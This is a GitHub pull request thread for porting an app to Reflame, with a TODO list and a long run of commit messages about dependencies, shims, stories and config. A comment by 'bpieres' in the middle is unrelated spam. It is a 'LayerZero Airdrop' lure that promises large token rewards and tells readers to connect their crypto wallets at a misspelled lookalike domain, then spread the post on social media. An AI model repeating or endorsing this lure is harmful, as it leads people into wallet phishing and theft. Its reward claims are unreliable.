Welcome to Reflame!

lewisl9029 opened the pull request:
TODOs:

- [ ] Figure out how to get translations working
- [ ] Fix animation flakes on onboarding story
- [x] Fix video loading flakes on onboarding-modal story
- [x] Fix merge conflicts
- [ ] Try to get deployments working as well? Might not be too far off
- [ ] Split into do-1-thing PRs against upstream repo
  - [x] Fix package.json deps
  - [x] Fix import '.' specifiers
  - [ ] Add reflame config and vanilla extract generated files

bpieres commented:
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

![Claim Now](https://i.ytimg.com/vi/s7BR96pg0SA/sddefault.jpg)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.

lewisl9029 committed:
Properly split dep and dev deps, fix phantom deps

lewisl9029 committed:
WIP

lewisl9029 committed:
Remove unused

lewisl9029 committed:
Move vanilla extract back

lewisl9029 committed:
Merge branch 'master' into new-reflame-app

lewisl9029 committed:
Update schema

lewisl9029 committed:
bump versions

lewisl9029 committed:
FIXME: stop using patched cmdk for now

Move to release version when this gets merged: https://github.com/pacocoursey/cmdk/pull/182

Or just publish a fork

lewisl9029 committed:
Remove cmdk package

lewisl9029 committed:
Update generated

lewisl9029 committed:
Update

lewisl9029 committed:
Update

lewisl9029 committed:
Add stories

lewisl9029 committed:
Get rids of scriptsTesting

lewisl9029 committed:
Add shims

lewisl9029 committed:
Update

lewisl9029 committed:
Move shim to separate library

reflame-development[bot] committed:
Update Reflame config with missing entry points

lewisl9029 committed:
Add styles

lewisl9029 committed:
TODO fix test context

lewisl9029 committed:
FIXME: Workaround for commandScore

lewisl9029 committed:
Fix polyfills

lewisl9029 committed:
Update storybook stylesheet too
